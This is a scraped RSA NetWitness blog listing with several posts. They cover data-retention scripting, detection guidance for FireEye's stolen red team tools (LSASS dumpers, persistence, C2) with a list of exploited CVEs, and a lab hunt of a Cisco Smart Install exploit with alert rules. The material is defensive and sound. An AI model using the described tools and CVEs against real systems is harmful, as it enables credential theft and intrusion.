Skip navigation
All Places > Products > RSA NetWitness Platform > Blog
1 2 3 Previous Next

RSA NetWitness Platform

621 posts

Overview

If you are looking at retention requirements for compliance, making decisions about the architecture, or to retain a decent investigation history, NetWitness retention is always at the top of these discussions.  As we all find out over time, retention is something that needs to be monitored for trends so informed decisions can be made to meet the corporate or regulatory retention requirements.  This article will shed some light on retention in the NetWitness Platform Systems and demonstrate how to view the retention numbers as a “stack”.  Scroll to the bottom to download the retention script related to this article.

 

Persistence

There are basically two levels of persistence in the NetWitness Platform:

  • Permanent - Final resting place for the data - It is NOT copied to another destination in the platform; i.e Network/Log Decoder raw packets/logs residing on the Network/Log Decoder
  • Temporary - Data that is copied (via aggregation) from this location to another device, i.e. The Concentrator consuming meta and sessions data from a Network/Log Decoder.  The meta and session data is considered temporary as only needs to reside on the Network/Log Decoder long enough to be consumed by the aggregating Concentrator.

 

Database Types

Below are the database types and the index used by the NetWitness Platform

  • PacketDB – Raw captured log/network data
    Present on Log/Network Decoders and Archivers
  • MetaDB – Meta data generated from Log/Network Decoder parsing and processing (App Rules/Feeds)
    Present on Log/Network Decoders, Concentrators and Archivers
  • SessionDB – Data that links the meta data and packet data together into sessions
    Present on Log/Network Decoders, Concentrators and Archivers
  • Index – Not really a database, but provides a method to lookup sessions using meta key values or session ID's.

 

NetWitness Systems

Let's take a look at how the database types, persistence, and the retention requirements relate to the individual NetWitness Systems.  

 

Log/Network Decoder

  • PacketDB
    • Permanent resting place (unless Log Archiver is deployed for Log Decoder)
      • Meet Your Requirement Retention Days
  • MetaDB
    • Temporary resting place
      • Typically like to see ~30 Days Retention
  • SessionDB
    • Temporary resting place
      • Typically like to see ~30 Days Retention

 

Concentrator

  • MetaDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • SessionDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • Index
    • Permanent Resting Place
      • Meet Your Requirement Retention Days

 

Log Archiver

  • PacketDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • MetaDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • SessionDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • Index
    • Permanent Resting Place
      • Meet Your Requirement Retention Days

 

Log Hybrid Retention

  • PacketDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • MetaDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • SessionDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • Index
    • Permanent Resting Place
      • Meet Your Requirement Retention Days

 

Interpreting The Numbers

Viewing The "Stack"

When examining retention it is best to evaluate the systems as a "stack".  This will assist in viewing the relationship between the capture devices (Network/Log Decoders) and the upstream consumers (Concentrators) of the data in relation to the corporate goal or regulatory requirement.  The image below shows the NetWitness "stacks" in this particular sample architecture.  Each individual stack is separated by the "----------", so we can see that there are 15 stacks, two of which are archivers.

 

NetWitness All Stacks

 

Determine The Retention

Determine if your goals or requirements are met by viewing the "Permanent" retention numbers.  *Note the Archiver permanent numbers are relative to a "Collection" name, there will always be a "default" collection.  If there were other collections, the row for each collection would be the "Permanent" retention numbers. 

 

NetWitness All Stacks Showing Permanent and Temp Numbers

 

The Retention Script

Attached is the retention script used to provide the outputs shown above.

The script provides output to file in two text formats and outputs to local and/or syslog target:

  • Table for console viewing (text format)
  • CSV for use in other programs
  • Syslog (CEF Format), it can send to a syslog target (unencrypted only - Logger limitation)
  • It writes the output to /var/log/messages (CEF Format)

Requirements

In order for the script file to function as designed, you will need the following prerequisites:

  • Install the NwBackup script, particularly the following scripts:
    • Run get-all-systems11.sh
    • Run ssh-propagate11.sh

Installation

  1. Download the retention script at the end of this article
  2. SSH to the console of the NetwWitness Server (Node Zero)
  3. Login as the "root" user
  4. Create the /root/scripts/admin 
    mkdir /root/scripts
    mkdir /root/scripts/admin
  5. Create the retention directories to store the output files (these are the defaults).
    mkdir /root/retention
    mkdir /root/retention/table
    mkdir /root/retention/csv
  6. Using WinSCP or other client to copy the script to the NetWitness Server (Node Zero) /root/scripts/admin directory
  7. Make the script file executable
    chmod +x /root/scripts/admin/netwitness_retention_csv.sh
  8. Edit the script file variable values to match your output directories, syslog server, and number of history days to keep for the CSV and table text files.

Manual Execution

  1. SSH to the console of the NetwWitness Server (Node Zero)
  2. Login as the "root" user
  3. After you have completed the Installation Steps, type the following command
    /root/scripts/admin/netwitness_retention_csv.sh
  4. You will see ouput to the console similar to below

NetWitness Retention Script Output

Crontab Scheduling Instructions

  1. SSH to NetWitness Server (Node-zero)
  2. Login as "root"
  3. Edit crontab
    crontab -e
  4. Add to crontab to execute once every 24 hours at 11pm UTC
    Press the following key
    Insert
    add the following text at the top or the bottom of the file
    ## Retention Script ##
    0 23 * * * /root/scripts/admin/netwitness_retention_csv.sh
    Press
    ESC
    Type the following keys
    :wq
    Press
    ENTER

 

Additional Notes

Since this data is now passed to the /var/log/messages it can ingested by the Log Decoder and partially parsed.  There will be a follow up article on properly parsing it and pulling this data into the Reporting Engine to spot trends.  Due to time constraints I was not able to add it to this article.

As you’ve surely seen, a recently discovered supply chain attack has impacted numerous organizations including corporations, government agencies, and nonprofits.  Information continues to emerge about the massive scope and scale of this attack and related threats.  Unfortunately events like these illustrate that none of us are immune to attacks, especially when conducted by sophisticated threat actors associated with nation-states.

 

This post is to keep you informed of RSA’s response to this developing situation.  Here’s what we can report:

  • At this point, our investigation has determined that neither RSA nor RSA products use the SolarWinds Orion software affected by the SUNBURST vulnerability announced on December 13th, 2020. RSA will continue coordinating with SolarWinds and our vendors on implementing any appropriate countermeasures and monitoring for appropriate indicators.
  • We are maintaining surveillance of the news and forensic archives regarding the SUNBURST attack on FireEye, which resulted in the theft of its “Red Team” tools for identifying vulnerabilities.  We have implemented countermeasures for the indicators of compromise (IoCs) identified by FireEye within RSA NetWitness Platform, as well as other security tools we use internally.

 

Diving deeper, the links below outline the approach our teams are taking – many of which are deployable to our RSA NetWitness Network and Endpoint tools. We are publicly offering this information to all, including organizations that don’t have RSA NetWitness Network or Endpoint, so that anyone can transpose/map this content into their detection tools.

 

RSA Link (login may be required):

 

There’s also the CVE data included in the GitHub repository that identifies which vulnerabilities these tools were levied against.

 

As always, RSA stands with the cybersecurity industry and our customers in defending against malicious actors like the ones behind this major attack.  If you have questions or concerns, or would like to speak with our technical teams, please let us know and we will coordinate efforts.

Introduction

FireEye recently released a large number of indicators to help security teams identify their set of stolen Red Team tools. The RSA IR team commends FireEye for releasing this information to the security community, to allow all of us to help better defend against attackers who might seek to abuse these tools.

While most security teams will be incorporating these indicators into their existing security detection infrastructure (https://community.rsa.com/community/products/netwitness/blog/2020/12/09/fireeye-breach-implementing-countermeasures-in-rsa-netwitness), the RSA IR team normally takes a different approach to identify threats, which is primarily focused on tool/attack behaviors instead of signatures.

The RSA IR team has long been a proponent of behavioral analysis, which in our experience help us continuously identify both known and unknown attackers. This analysis philosophy, coupled with an “Assume Breach” mindset, is at the core of Threat Hunting and Incident Response within our team. Therefore, in this blog we will look at the behavioral aspects of the tools related to the FireEye release of indicators, and provide some examples of how identifying suspicious behaviors can help identify attacker activity, without the need for specific signatures.

 

Credential Dumping

Adversaries attempt to dump credentials to obtain account login and credentials, normally in the form of a hash or a clear text password, from the operating system and software.

 

SafetyKatz

SafetyKatz is an open source tool, which is available on GitHub (https://github.com/GhostPack/SafetyKatz). It is an all inclusive LSASS password dumper. This tool will dump the memory of the LSASS process using the Windows API call, MiniDumpWriteDump, and then load a custom C# implementation of Mimikatz to pull information from the dump, subsequently deleting the LSASS dump file when it is finished.

 

Executing SafetyKatz on a host with NetWitness Endpoint, we can easily detect its usage via a number of indicators. From the screenshot below, we can see that NetWitness flags the file as malicious, based of RSA's file reputation lookup service. Furthermore, the agent generates metadata based of the behavior of the tool itself under the Behaviors of Compromise meta key, which is an unsigned application opening LSASS. Depending on how an attacker may use this tool, other generic behaviors, such as the location and name of the binary itself, can be part of the overall characteristics of this behavior. These behaviors should immediately stand out as suspicious and warrant further triage:

To configure file reputation lookup, please refer to the following article: Context Hub: Configure Live Connect as a Data Source.

                                                                                  

 

Executing the YARA rule from FireEye against the SafetyKatz binary, we can see that we indeed get a hit:

 

 

AndrewSpecial

This tool is similar to SafetyKatz in that it is open source (https://github.com/hoangprod/AndrewSpecial), and will create a dump file of the LSASS.exe process using the MiniDumpWriteDump Windows API call. It will not however, extract credentials from the dump created. From the screenshot below, you can see that the tool exhibits the same behaviour as SafetyKatz, in that it is an unsigned tool opening LSASS. This tool again, running from a unexpected directory should stand out to defenders and warrant further triage:   

 

Executing the YARA rule from FireEye against the AndrewSpecial binary, we can see that we indeed get a hit:

 

 

Closing Notes

The important takeaway from these two tools, is that simply relying on atomic indicators of compromise, such as signatures, which the attacker can easily avert, is not a scalable easily maintained solution to detection. Instead, relying on the behaviours of these tools and how they have to operate in order to achieve their goal, such as opening a handle to LSASS in order to dump the memory, we can easily detect the seldom used and unknown tools.

 

 

Discovery

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act.

 

SharpHound

In addition to NetWitness Endpoint flagging the tool's presence as malicious, we can still detect unwarranted tools being introduced into an environment through daily hunting. NetWitness Endpoint has two meta keys called dir.path.src and dir.path.dst that will group files running out of certain directories. We can then as defenders pivot into interesting locations and look for suspicious executables running from suspicious locations with ease:

 

 

For example, pivoting on dir.path.dst = 'uncommon' - we can look at all the files being executed out of uncommon directories. From the below we can see that cmd.exe was used to launch a suspect binary from C:\PerfLogs\ named, shp.exe:

 

This is a useful tactic to find malicious tools, as typically (but not always), attackers do not run their tools from the users Desktop.

 

Closing Notes

Sometimes it is not about having a signature to detect the tool and how it works, but rather to find the tool based on anomalous characteristics of its execution, such as it running from a suspect location. Discovery tools are constantly evolving and adapting to evade detection, meaning signatures for them can easily become obsolete.

 

Lateral Movement

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it.

 

Impacket

Part of the FireEye indicators included references to Impacket tools (https://github.com/SecureAuthCorp/impacket) such as smbexec. As part of our Profiling Attackers Series, two of these tools that aid in lateral movement have already been covered in previous RSA blogs, which we recommend you read:

 

 

However, it is worth mentioning a new feature in NetWitness that has been added since the release of those blogs. Namely, NetWitness has now introduced host-based information matched to the Packet data. If you have both NetWitness Packets and NetWitness Endpoint, as of 11.5.1, packet sessions will be enriched with the associated host based data, giving defenders the full picture from both the endpoint perspective as well as the network perspective:

 

To configure and learn more see the following article: https://community.rsa.com/docs/DOC-86987#Host

                                                                

 

Closing Notes

In order for an attacker to achieve their end goal, they are going to have to laterally move to other endpoints. While custom tools such as Impacket have been developed to make this task easier, as shown by the FireEye breach, the tools can be obfuscated to easily evade signatures. Whereas, as shown in the blog posts, relying on the behaviors of the tools we can ensure that we will always identify their usage.

 

Persistence

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

 

ZeroLogon

This is an exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass. Ultimately, this allows for an attacker to reset the machine account of a target Domain Controller, leading to Domain Admin compromise.

 

One of our content developers William Motley, updated the DCERPC Lua parser when this vulnerability was initially announced to detect this behavior on the network. This parser will generate the meta value, zerologon attempt, under the ioc meta key when the behavior is observed. Prior to the update of the DCERPC parser, the ZeroLogon CVE has previously been covered by Halim Abouzeid, and is a recommended read to show how these exploits can still be detected without signatures:

 

 

SharPersist

This is a custom tool developed by FireEye, and is freely available on GitHub (https://github.com/fireeye/SharPersist). This tool makes it incredibly quick and easy to setup persistence on an endpoint. We ran some of the mechanisms it offers on one of our victim hosts to see what meta values NetWitness creates.

 

One of the switches for the tool adds persistence via the registry using the \CurrentVersion\Run key. The following query can be used to identify any application persisting itself in this manner:

action = 'createregistryvalue' && ec.subject = 'runkey'

                        

 

 

Autoruns (i.e. persistent files) also have their own section for each endpoint. These can be reviewed in order to identify potentially malicious autoruns based on various characteristics of the file, such as signed/not signed, frequency in the network, location, etc. The screenshot below shows a malicious registry autorun:

 

 

The screenshot below shows a malicious service:

 

 

The screenshot below shows a malicious task:

 

 

You should also be collecting the Windows logs from your endpoints as well, as these can be used to help identify malicious autoruns. Querying events where reference.id = '7045' will show newly created services, these should be analysed to find potentially malicious services, from the below screenshot we can see that a suspect service was created referencing a binary in a suspect location:

 

Executing the YARA rules from FireEye against the SharPersist binary, we can see that we indeed get a hit:

 

Closing Notes

Again we have shown that regardless of the tools being used, the persistence mechanisms can all be detected based on the behavior of the service/task/autorun as well as the characteristics of the file behind the persistence mechanism.

 

 

Command and Control

Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.

 

DShell

We executed one of the tools identified by FireEye as, DShell (backdoor), to see what what indicators we could use to identify its usage within an environment. What we noticed was that the tool adds itself and its C2's as an exception in the firewall using netsh.exe; this gets identified by NetWitness Endpoint with the two meta values shown below:

 

 

It should be noted that in general, any C2 type file will exhibit additional behaviors once it is used to do something useful, such as upload/download files, enumerate processes/services/file system, etc. Here, we are simply executing it to observe its initial behavioral footprint.

 

Navigating to the events view we can see that the binary was located in C:\PerfLogs\ and named Program.exe. It spawned cmd.exe and passed the netsh argument to it:

 

 

This is one tactic for many C2's, njRAT for example will do the same, albeit with a slightly different command. For example, the njRAT execution on ANY.RUN exhibiting the same behavior can be found at the following link: https://app.any.run/tasks/7d09956b-6843-45f6-8bbf-5a5880999961/. This again shows that utilising the behaviour of the tool would allow defenders to identify its usage and others without having to rely on signatures.

 

Executing the YARA rule from FireEye against the DShell binary, we can see that we indeed get a hit:

 

 

Cobalt Strike / Meterpreter / DNS Tunnelling

A number of the signatures released by FireEye reference Cobalt Strike, Meterpreter and DNS tunnelling. While we have covered these tools in prior posts, some of the network detection discussed in them cannot be directly applied to the tools released by FireEye. This is because tools such as Cobalt Strike allow for malleable profiles that can easily be altered. With that being said, the hunting principles outlined in our Profiling Attackers Series whereby we hunt for these tools based on behaviours, shows that they can still be detected via proactive hunting:

 

 

 

Closing Notes

We have discussed hunting for C2's a number of times in other blog posts. Due to their flexibility and ability to dynamically change, it is seldom useful to employ signatures for their detection. Instead, identifying suspect characteristics associated with the communication can make them stand out even when they attempt to blend in:

 

 

 

Conclusion

The key takeaway from this post is while signatures are an easy way to detect known malicious tools/files, they are not ideal for today's network defense from the more sophisticated attacks. The intrusion into FireEye's network itself demonstrates this fact. The RSA IR team's philosophy is to assume a breach, and use daily hunting to identify abnormal behaviors in your network. We also always encourage our clients to invest in hunters who use our toolset to "patrol" the network both from the packet and endpoint perspectives. The sole reliance on signatures and alerts generated by them will only protect you from the known attacks. Signatures can be typically easily averted and become stale rather quickly. On the other hand, behaviors are more generic and fairly static, and will always allow you to detect what the signatures would have detected as well as malware not covered by signatures. 

I'm certain everyone reading this was just as shocked by the recent news about the FireEye breach as I was and is diligently trying to assess their current security posture in light of this information. As we at RSA validate and improve our coverage based upon the disclosed data, let us all not miss the larger picture at hand. By focusing on the details within FireEye's blog posts and GitHub countermeasures repository, we can digest the information published to make a dedicated plan for identifying the vulnerabilities these tools exploit and detecting use of the tools themselves within our environments.

 

It would be easy to miss what I consider a secondary information goldmine due to the sheer volume of signatures cataloged in various formats, and that is the prioritized list of vulnerabilities. Overall, there were 16 related Common Vulnerabilities and Exposures (CVEs) FireEye posted to GitHub which contain multiple remote code execution procedures for various platforms (to include Citrix, Manage Engine, and Confluence) and a few privilege escalation mechanisms:

  • CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0
  • CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 10.0
  • CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN - CVSS 9.8
  • CVE-2018-15961 – RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell) - CVSS 9.8
  • CVE-2019-0604 – RCE for Microsoft Sharepoint - CVSS 9.8
  • CVE-2019-0708 – RCE of Windows Remote Desktop Services (RDS) - CVSS 9.8
  • CVE-2019-11580 - Atlassian Crowd Remote Code Execution - CVSS 9.8
  • CVE-2019-19781 – RCE of Citrix Application Delivery Controller and Citrix Gateway - CVSS 9.8
  • CVE-2020-10189 – RCE for ZoHo ManageEngine Desktop Central - CVSS 9.8
  • CVE-2014-1812 – Windows Local Privilege Escalation - CVSS 9.0
  • CVE-2019-3398 – Confluence Authenticated Remote Code Execution - CVSS 8.8
  • CVE-2020-0688 – Remote Command Execution in Microsoft Exchange - CVSS 8.8
  • CVE-2016-0167 – local privilege escalation on older versions of Microsoft Windows - CVSS 7.8
  • CVE-2017-11774 – RCE in Microsoft Outlook via crafted document execution (phishing) - CVSS 7.8
  • CVE-2018-8581 - Microsoft Exchange Server escalation of privileges - CVSS 7.4
  • CVE-2019-8394 – arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus - CVSS 6.5

 

What does all of this mean to us? The beauty is that we can lower our overall threat profile and take a driven approach by calculating the current risk within our organizations through reviewing vulnerability scan data, developing an action plan related to patching assets vulnerable to these CVEs, and continuing to assess the situation with an increased risk register applied to the items listed above (remembering asset + threat + vulnerability = risk). This may be a good time to consider a proactive attitude toward integrating this extremely valuable data into a SOAR solution that can ingest, categorize, report, and respond to these indicators in an automated, vendor-agnostic fashion through robust integrations (e.g., RSA NetWitness Orchestrator).

 

I would also be remiss if I didn’t take the opportunity to discuss the exemplary effort made by Lee Kirkpatrick in his ‘Profiling Attackers Series’ where he covers many of the exploitation frameworks FireEye leveraged as part of their red-team engagements. We know the vast majority (approximately 83%) of these disclosed tools were free and open-source projects and these posts go through a great deal of information on how to detect this nefarious activity within your environments.

 

At RSA we strive to provide cutting-edge technologies that not only offer unparalleled endpoint, log, network, and behavioral visibility to detect and respond to emerging threats but also provide updated content whenever available to make our customers’ jobs easier and their efforts more impactful. This is no exception. Please see our post highlighting initial detections for more information FireEye Breach - Implementing Countermeasures in RSA NetWitness.

What Happened

On December 8th, 2020, FireEye announced that it had been the victim of a cyber attack perpetrated by an advanced nation state actor.  They've disclosed their research into the attack in a few places, including: 

 


https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html
 


As part of the breach, a large number of FireEye's Red Team tools were exposed to the attackers.  FireEye very quickly published a large set of countermeasures for the global community to use in detecting use of the malicious use of these tools, including:

  • Yara Signatures
  • Snort Signatures
  • FE Helix Signatures
  • ClamAV Signatures

 

All of these can be found on their Github Repository, here:  GitHub - fireeye/red_team_tool_countermeasures 

 

Implementing Countermeasures in RSA NetWitness 

There are no silver bullets when it comes to detection and responding to threats of any nature, let alone ones executed by advanced-capability actors.  It's important for organizations to take a holistic approach, manage and prioritize patching, and continue to evolve their proactive hunting capabilities.  To that end, please take a look at a couple other blog posts from our field teams discussing their approach and the capabilities that already exist in the NetWitness to help respond to this situation and detect usage of some of the malicious toolkit:

 

FireEye Breach - Beyond the signatures  - A great post from our Threat Hunting team discussing overall approach and the exploited vulnerabilities.

FireEye Breach  - A great post from our IR team talking about the existing NetWitness visibility into many of the tools implicated in the attack.

 

In addition to those, we do want to ensure we can guide customers through the relevant detection opportunities, whether re-purposing the existing countermeasures published by FireEye (and others) or developing detections native to the RSA NetWitness platform.  We are working through this process right now and will update this page accordingly if/as we learn more.  As a start, please consider the following implementation of the provided Snort and Yara Signatures:

 

Snort Rules

As of 11.5, we have a much improved and expanded ability to deploy snort signatures.  FireEye has published this set of snort signatures to detect related activity on the network: https://raw.githubusercontent.com/fireeye/red_team_tool_countermeasures/master/all-snort.rules 

 

These rules can be uploaded to Network Decoders by following the instructions here: https://community.rsa.com/docs/DOC-96852#Configur 

 

From here, any matches on any of the signature IDs (captured in the sig.id meta key) can be queried in Investigate via: sig.id=25894,25893,25874,25881,25879,25848,25887,25873,33355045,25872,25890,25892,25878,25891,25857,25880,25885,25900,62010239,25886,25875,25889,25877,25888,25884,25902,25866,25899,25882,25876,25901,25849,100001,25850

 

You may also consider creating an app rule on the decoder to create a single additional meta value when the above condition holds true, simplifying the subsequent search condition and ESA alert logic (if you choose to create an alert). An example of a manually created ESA Alert for any matches against that snort signature set is below:

 

 

Yara Signatures

Customers who have the Malware Analysis component can deploy the Yara signatures FireEye has published here: https://github.com/fireeye/red_team_tool_countermeasures/blob/master/all-yara.yar

 

Instructions on enabling this custom Yara content on a Malware Analysis appliance can be found here: MA: Enable Custom YARA Content 

 

We will continue to update this blog post with additional information relating to these countermeasures as we have it.

Table of Contents

Simple RCE

The attack: CVE-2018-0171 (Cisco Smart Install RCE). We will simply be pulling the startup-config. This CVE can be exploited to do more damage but that is not the point of this post.

Why is this simple? Well, this exploit has public proof-of-concept code available, it requires no authentication, and it can be executed externally.

Why should you care? Based on some crude Shodan searches, there are tens of thousands externally facing switches (most of which are in the U.S) that are potentially vulnerable to this exploit. A good friend of mine brought this exploit up to me based on results from a recent penetration test which tells me that it is a relevant attack still.

Quick Tips

  1. Don't test this exploit outside of a lab.
  2. The contents in the video are educational only and as owner of the switch, I consented to pwning it.

 

Finding Abnormal Traffic

This is a packets only post. In my lab I have captured the attack from a Kali box(10.1.1.20) that is external to the switch (192.168.10.254) via a span port on the switch that was abused (ironic eh?). In my lab the switch is not internet facing for obvious reasons but kali is on a network external to the switch to simulate an external attack.

 

The first step is to understand your network. As an analyst, you should understand the network in which you are protecting (this knowledge comes over time). This is important because you need to be able to find what traffic does not fit into the normal flow. For instance, you most likely won't see TFTP being used often legitimately as the traffic is cleartext. You're more likely to see SCP or SFTP. That makes TFTP an investigation point, regardless if the traffic appears harmless.

 

In this lab, I'd expect to see SSL, DNS, NTP, HTTP, and SSH as part of the normal flow. When starting to look for abnormal traffic, pick a direction. Picking a direction is easy if you have traffic flow direction setup.

 As a consultant one of the first things I like to setup once an environment is deployed is "Traffic Flow". You can find this  under the Live Content tab by searching for "traffic flow". It will need to be configured with internal/external subnet  information to function. Please let us know if you want more information on that piece.

By picking a direction, we have narrowed the scope of the hunt. Looking at all the data is like finding a needle in a haystack. Since we are looking for an external attack, I selected inbound traffic. As kali is external to the switch's LAN, any connection made by kali to the switch will show up in this traffic direction. Immediately in the screen shots above TFPT stands out. TFTP is a UDP transfer protocol on port 69. In my lab this is abnormal but TFTP does exist in some environments so its presence by itself is not indicative of an attack but it is a point of investigation. By clicking the green (1) next to TFTP we can view the event and reconstruct the packet.

Clearly, something isn't right here. We have a few different breadcrumbs to follow.

  1. Why is a startup-config file from a Cisco switch moving in cleartext across the network?
  2. Why is it moving outside the LAN?
  3. What is 10.1.1.20?

Without having per-existing knowledge of the attack, I'd start with answering these questions. We can go about this a couple ways. You can take a gamble on the CVE showing up in a vulnerability scanner or we can piece meal what happened. I'm starting with investigating 10.1.1.20. If you're new to NetWitness, you can further the investigation by tacking on a another query in the investigation tab. The idea here is to carve out the data we don't need so that we get closer to finding the information we do.

Seeing traffic in OTHER can often turn into a rabbit-hole of data but looking at it when its been carved out a bit can often lead to interesting information. By reconstructing the packet the same way as before we can see relevant data. We can see a TCP connection on port 4786 (Cisco Smart Install) and what appears to be a remote command calling for the startup-config we saw transferred over the wire. We can look at this a little more granular via the web tab.

I personally think the Hex view is the most useful and we can see most of the same information here as before. Although not necessarily more useful in this specific scenario, you'll find it easier to reconstruct fragmented packets (like what is found in the more recent bad neighbor exploit) in this view. The default view will also try to reconstruct any web pages.

So far we know that an external device pulled the startup-config file from the switch via TFTP after an initial TCP connection via port 4786. This is enough information to do a google search and the query "cisco port 4786" will give you plenty of results on the exploit you just witnessed. Its fair to say that the switch was attacked but your job doesn't end there. We saw a password in cleartext and the presence of inbound HTTP traffic which tells me that this switch most likely has web GUI. Using the same steps as above we can look at the HTTP traffic.

 

Some pieces of web content will automatically be reconstructed while investigating.

 

While looking at the event meta for the HTTP traffic, it is pretty clear that a login attempt was made.

At this point we have a compromised device. This is the part where remediation begins and an incident report gets created. This is also where as analysts, we will begin to think about how to make our response faster in the future. This attack did not show up in the Cisco logs. Depending on your organization's size, you may have multiple devices that are vulnerable to the same attack (hopefully not many externally facing). This becomes tricky and time intensive for large organizations with network devices spread across multiple sites. We also don't want to make a routine of checking for this attack going forward every day. Part of remediation should be to take an inventory of devices at risk and create a plan to mitigate the threat but that can take time and we need to monitor until that process is complete. We have other threats to look for and the point of NetWitness is to save you valuable time. To help monitor the threat during remediation, we can create an alert to fire based on a set criteria.

 

Content Creation

Part of an analyst's role is to be proactive rather than solely reactive. To help monitor the situation created by this hunt, we can create content to alert us when a possible attack is detected. By automating this task, we can spend more time looking for other threats. This section will cover creating a basic ESA rule to create an alert. The bonus section will cover extending functionality with NetWitness Logs, a simple Shodan integration, and a simple Censys integration. 

 

ESA Rule Builder

The most effective way to handle this threat will be creating an ESA Correlation Rule. We can do this by heading to the configuration section on the NetWitness main navigation bar. From there, you can click on "ESA Rules" as depicted below and you'll see the rule library by default. The view on versions earlier than 11.5 will be slightly different. Instead of icons, the word "Configure" will be in the top navigation bar.

11.5 ESA

At this point we can create a new rule using the rule builder.

The rule name will be what shows up in Respond and also what we will be using for the log aspect further down. I personally use CVE names when I can. The reason for this is because there are a lot of threats and looking up the CVE is quicker when the alert is named after it. We will utilize this further down with a Shodan lookup. Always enable "Trial Rule" for a new rule. It will protect the ESA from crashing if a bad rule is created. We do want to alert off the rule so ensure that is checked off (should be by default) and adjust the severity to your organizations guidelines. Once that is done, we will add two conditions as this attack had two distinct criteria.

The first condition will look for Cisco Smart Install connections on TCP port 4786. Based on what was seen in the investigation, the attack starts with a connection to 4786 and is immediately followed by the TFTP transfer over UDP port 69.

The second condition will look for TFTP traffic.

Once that is complete, we need to configure more information for the conditions. On the first condition, set the "Connector" to be "followed by", "Correlation Type" to "SAME", and the "Meta" to "ip_dst. The "followed by" means as the name implies. It is different than an "AND" type in that the following condition must occur after the first. We are looking to group by "ip_dst" because in the event you have multiple switches attack at the same time, we make sure the alerts are organized by each device. Due to the immediate TFTP transfer, we will set the "Occurs Within" to 1 minute.

 


Optional: If you have a SIEM, you can send the alert to the SIEM via syslog. This requires that a syslog server is configured in the global notification settings under the system settings in the administration menu.

At this point, we can save the rule. If you click "show syntax", you will be able to see the Esper syntax. This is the format in which advanced rules are written. When you hit save, if there is an issue with the rule, it will not save and the issue will be highlighted in red. Once the rule is created, it needs to be added a deployment.

If the attack is detected again, it will show up in respond as shown in the video below. 

 

Bonus

We will extend the base functionality in a couple of ways. The first being a fun trick I picked up if NetWitness Logs is also in the environment. As seen in the ESA Rule builder, the rule can send a notification via syslog. In this instance, I configured my Endpoint Log Hybrid as a syslog server destination. So when the ESA rule triggers, a notification is sent to the log decoder service as syslog. A NetWitness Log Decoder will parse syslog sent by another NetWitness appliance (ESA in this case) by default and will identify the source accordingly as seen below (look at "Device Type"). The important fields here are "Device Type" and "Event Description". With these fields we can create an app rule on the log decoder. The app rule will populate the "alert" meta with the CVE name.

Decoder App Rule

On 11.5, the admin settings are accessible by the tools icon on the right hand side of the navigation bar. On all other 11.x versions, there is an Admin tab on the navigation bar. Once there, go to services and go to the packet decoder(s) config page.

Make sure that you use the same name as the ESA Rule. This way when you see the alert, you'll know exactly what triggered it. Now earlier I mentioned how I like to use the CVE names for this kind of content. Part of this is because there are millions of CVEs in existence and a shortcut I came up with was to integrate with Shodan's exploit lookup.

We can accomplish this by setting up a context menu action. This is completed in the administration menu and only needs to be completed once per meta value. So going forward, we will be able to right-click a value in the alert meta and look it up in Shodan. 

Add a new menu option by click on the red plus sign and edit the values as below. You will need to use your own Shodan API key.

Once you hit save, either reload a tab that has investigation open or open a new one. Any value in the alert meta will have a right click option for "Shodan Exploit" going forward. Its a quick function that saves time when trying to figure out what CVE is what. If you really don't want to use CVE names, that is fine too. Use a name associated with the exploit. In this instance, I could use "Cisco Smart Install" and Shodan will query various resources (Ex. ExploitDB) and provide me links. Use of the CVE name just provides me an immediate result without having to look through search results.

 

Packet Bonus

In the previous section, we went over adding a Shodan right-click function to alert meta, but what if you only have packets. Surely you can extend that too. You'd be correct. One common extension of functionality that I like to do is to add Censys and/or Shodan to the IP related meta (ip.dst, ip.src, ip.addr). There are more tools we can add but we'll cover those in another post later on. We're going to move away from the attack for this section because I did not make my vulnerable switch internet facing for obvious reasons (I did not want to get pwned by a stranger/bot). I'll show the Censys integration on an external IP as most tools will not be able to provide data on my internal LAN. Here is a use case though. You want to quickly determine how many of your externally facing switch could potentially be vulnerable to the attack we discussed above. Wouldn't it be nice to look at the IP meta in NetWitness, right-click the externally facing switch IP and instantly get a print out out on which ports are open? Specifically if port 4786 is open. No API key, nmap, or vulnerability report required.

I redacted some information from the results but you can see what is important. If a vulnerable switch had be queried, we would see 4786 as open. Setting this up is easier than Shodan as you won't need an API for the base lookup functionality. Following the same steps as above, create another Context Menu Action.

 

Afterthoughts

Here is a high-level overview of what this post covered:

  • Switch gets pwned
  • We review hunting basics
  • We find said pwning during routine hunt
    • We have notified operations and hopefully a change order is in the works to remediate this threat
    • Until remediation is done, we have to monitor for further pwning and identify vulnerable devices
  • We can make monitoring more effective with the alerting functionality within Respond
    • ESA rule building
  • We can extend the NetWitness out-of-box functionality with third-party integrations such as Shodan and Censys

